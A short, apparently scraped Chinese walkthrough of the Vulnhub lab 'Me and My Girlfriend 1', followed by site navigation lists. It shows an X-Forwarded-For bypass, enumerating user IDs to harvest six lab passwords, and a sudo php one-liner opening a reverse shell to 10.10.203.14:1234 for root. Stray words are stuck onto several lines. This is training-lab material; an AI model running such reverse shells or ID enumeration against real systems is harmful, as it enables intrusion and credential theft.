Girlfreind:1 Vulnhub Walkthrough
靶機連接:php
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/web
主機掃描:ssh
HTTP 目錄訪問,提示無權限,右鍵源碼,提示XXF便可3d
正常訪問,註冊一個用戶,登陸,而後查看用戶profile,經過id進行遍歷枚舉用戶密碼blog
eweuhtandingan skuyatuh
sedihaingmah cedihhihihi
aingmaung qwerty!!!
abdikasepak dorrrrr
sundatea indONEsia
alice 4lic3
pentest pentest源碼
經過注意登陸web,無發現上傳的點test
而後經過ssh嘗試登陸登錄
提權操做sed
sudo /usr/bin/php -r '$sock=fsockopen("10.10.203.14",1234);exec("/bin/sh -i <&3 >&3 2>&3");'date
OVER !!
相關文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. HA: Dhanush Vulnhub Walkthrough
- 3. HA: Chakravyuh Vulnhub Walkthrough
- 4. Sunset: dusk: Vulnhub Walkthrough
- 5. Happycorp:1 Vulnhub Walkthrough
- 6. Sunset: Nightfall Vulnhub Walkthrough
- 7. HA: Chanakya Vulnhub Walkthrough
- 8. HA Joker Vulnhub Walkthrough
- 9. Matrix-3: Vulnhub Walkthrough
- 10. Sunset: Vulnhub Walkthrough
- 更多相關文章...
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 字節跳動21屆秋招運營兩輪面試經驗分享
- 2. Java 3 年,25K 多嗎?
- 3. mysql安裝部署
- 4. web前端開發中父鏈和子鏈方式實現通信
- 5. 3.1.6 spark體系之分佈式計算-scala編程-scala中trait特性
- 6. dataframe2
- 7. ThinkFree在線
- 8. 在線畫圖
- 9. devtools熱部署
- 10. 編譯和鏈接
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. HA: Dhanush Vulnhub Walkthrough
- 3. HA: Chakravyuh Vulnhub Walkthrough
- 4. Sunset: dusk: Vulnhub Walkthrough
- 5. Happycorp:1 Vulnhub Walkthrough
- 6. Sunset: Nightfall Vulnhub Walkthrough
- 7. HA: Chanakya Vulnhub Walkthrough
- 8. HA Joker Vulnhub Walkthrough
- 9. Matrix-3: Vulnhub Walkthrough
- 10. Sunset: Vulnhub Walkthrough